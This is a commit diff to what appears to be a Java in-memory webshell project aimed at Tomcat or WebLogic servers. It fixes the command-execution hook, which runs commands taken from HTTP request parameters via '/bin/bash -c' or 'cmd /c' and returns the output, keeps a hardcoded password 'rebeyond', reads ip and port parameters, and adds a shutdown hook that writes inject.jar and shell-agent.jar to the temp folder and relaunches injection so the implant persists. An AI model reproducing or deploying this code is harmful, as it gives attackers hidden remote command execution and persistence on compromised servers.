修复linux执行命令的bug以及持久化的bug

Author: keven1z

inject/dependency-reduced-pom.xml

@@ -3,7 +3,7 @@
   <modelVersion>4.0.0</modelVersion>
   <groupId>org.example</groupId>
   <artifactId>inject</artifactId>
-  <version>1.1</version>
+  <version>1.2</version>
   <build>
     <sourceDirectory>src</sourceDirectory>
     <finalName>inject</finalName>
@@ -29,5 +29,12 @@
       </plugin>
     </plugins>
   </build>
+  <properties>
+    <maven.compiler.encoding>UTF-8</maven.compiler.encoding>
+    <maven.compiler.target>1.8</maven.compiler.target>
+    <java.version>1.8</java.version>
+    <maven.compiler.source>1.8</maven.compiler.source>
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+  </properties>
 </project>
 

inject/pom.xml

@@ -6,7 +6,7 @@
 
     <groupId>org.example</groupId>
     <artifactId>inject</artifactId>
-    <version>1.1</version>
+    <version>1.2</version>
     <build>
         <finalName>inject</finalName>
         <sourceDirectory>src</sourceDirectory>
@@ -22,6 +22,7 @@
                             <goal>shade</goal>
                         </goals>
                         <configuration>
+
                             <transformers>
                                 <transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
                                     <mainClass>main.java.Attach</mainClass>
@@ -42,4 +43,11 @@
             <version>1.8.0_jdk8u172-b11</version>
         </dependency>
     </dependencies>
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <maven.compiler.encoding>UTF-8</maven.compiler.encoding>
+        <java.version>1.8</java.version>
+        <maven.compiler.source>1.8</maven.compiler.source>
+        <maven.compiler.target>1.8</maven.compiler.target>
+    </properties>
 </project>

inject/src/main/java/Attach.java

@@ -45,7 +45,6 @@ public static void main(String[] args) throws IOException {
                 }
             } catch (Exception e) {
                 e.printStackTrace();
-                System.exit(-1);
             }
         }
 

memshell_asm/dependency-reduced-pom.xml

@@ -3,7 +3,7 @@
   <modelVersion>4.0.0</modelVersion>
   <groupId>cn.com.x1001</groupId>
   <artifactId>ShellAgent</artifactId>
-  <version>1.0-SNAPSHOT</version>
+  <version>1.2-SNAPSHOT</version>
   <build>
     <resources>
       <resource>
@@ -28,12 +28,6 @@
           </execution>
         </executions>
         <configuration>
-          <transformers>
-            <transformer>
-              <resource>META-INF/forcedelete.exe</resource>
-              <file>src/main/resources/forcedelete.exe</file>
-            </transformer>
-          </transformers>
           <minimizeJar>true</minimizeJar>
         </configuration>
       </plugin>

memshell_asm/pom.xml

@@ -56,12 +56,6 @@
                     </execution>
                 </executions>
                 <configuration>
-                    <transformers>
-                        <transformer implementation="org.apache.maven.plugins.shade.resource.IncludeResourceTransformer">
-                            <resource>META-INF/forcedelete.exe</resource>
-                            <file>src/main/resources/forcedelete.exe</file>
-                        </transformer>
-                    </transformers>
                     <minimizeJar>true</minimizeJar>
 <!--                    <filters>-->
 <!--                        <filter>-->

memshell_asm/src/main/java/cn/com/x1001/Agent.java

@@ -16,6 +16,9 @@ public class Agent {
     public static InstrumentationContext context = new InstrumentationContext();
     public static String currentPath;
     public static String password = "rebeyond";
+    private final static String AGENT_NAME = "shell-agent.jar";
+    private final static String INJECT_NAME = "inject.jar";
+
     public static byte[] injectFileBytes = new byte[]{}, agentFileBytes = new byte[]{};
 
 
@@ -26,8 +29,6 @@ public static void agentmain(String args, Instrumentation inst) throws IOExcepti
         } else {
             Agent.currentPath = args;
         }
-        out.println("Agent password:" + Agent.password);
-        out.println("Agent currentPath:" + Agent.currentPath);
         start(inst);
     }
 
@@ -58,7 +59,7 @@ private static void start(Instrumentation inst) {
             clear();
             persist();
         } catch (Exception e) {
-//            System.out.println(e);
+            out.println(e.getMessage());
         }
 
     }
@@ -83,14 +84,11 @@ public static void addHook() {
 
     public static void persist() {
         try {
-//            out.println("persist add");
             Thread t = new Thread() {
                 public void run() {
                     try {
-//                        out.println("persist start");
-                        writeFiles("inject.jar", Agent.injectFileBytes);
-                        writeFiles("shell-agent.jar", Agent.agentFileBytes);
-//                        out.println("persist end");
+                        writeFiles(INJECT_NAME, Agent.injectFileBytes);
+                        writeFiles(AGENT_NAME, Agent.agentFileBytes);
                         startInject();
                     } catch (Exception e) {
 
@@ -100,15 +98,16 @@ public void run() {
             t.setName("shutdown Thread");
             Runtime.getRuntime().addShutdownHook(t);
         } catch (Throwable t) {
-            out.println(t.getMessage());
+
         }
     }
 
-    private static void startInject() throws InterruptedException, IOException {
-        Thread.sleep(2000);
+    private static void startInject() throws Exception {
+        Thread.sleep(3000);
         String tempFolder = System.getProperty("java.io.tmpdir");
-        String cmd = "java -jar " + tempFolder + File.separator + "inject.jar " + Agent.password;
+        String cmd = "java -jar " + tempFolder + File.separator + INJECT_NAME+" " + Agent.password;
         Runtime.getRuntime().exec(cmd);
+
     }
 
     static byte[] mergeByteArray(byte[]... byteArray) {
@@ -133,13 +132,16 @@ static byte[] mergeByteArray(byte[]... byteArray) {
         return result;
     }
 
+    public static void main(String[] args) throws Exception {
+        readInjectFile("C:\\Users\\fbi\\Documents\\javaProject\\weblogic_memshell\\inject\\target");
+    }
     public static void readInjectFile(String filePath) throws Exception {
-        String fileName = "inject.jar";
+        String fileName = INJECT_NAME;
         readFile(filePath, fileName);
     }
 
     public static void readAgentFile(String filePath) throws Exception {
-        String fileName = "shell-agent.jar";
+        String fileName = AGENT_NAME;
         readFile(filePath, fileName);
     }
 
@@ -152,7 +154,8 @@ private static void readFile(String filePath, String fileName) throws Exception
         byte[] bytes = new byte[1024 * 100];
         int num = 0;
         while ((num = is.read(bytes)) != -1) {
-            agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num));
+            if (fileName.equals(AGENT_NAME)) agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num));
+            else if (fileName.equals(INJECT_NAME)) injectFileBytes =  mergeByteArray(injectFileBytes, Arrays.copyOfRange(bytes, 0, num));
         }
         is.close();
     }

memshell_asm/src/main/java/cn/com/x1001/hook/ShellChecker.java

@@ -24,12 +24,10 @@ public static void check(Object[] args, Object o) {
             String cmd;
             try {
                 cmd = execute(c);
-                httpResponse.write(cmd);
             } catch (Exception e) {
                 cmd = e.getMessage();
             }
             httpResponse.write(cmd);
-
         }
         String ip = coyoteRequest.getParameter("ip");
         String port = coyoteRequest.getParameter("port");
@@ -57,7 +55,7 @@ public static String execute(String cmd) throws Exception {
             if (osName.contains("windows")) {
                 processBuilder = new ProcessBuilder("cmd", "/c", cmd);
             } else {
-                processBuilder = new ProcessBuilder("/bin/bash", cmd);
+                processBuilder = new ProcessBuilder("/bin/bash","-c", cmd);
             }
             Process process = processBuilder.start();
             in = process.getInputStream();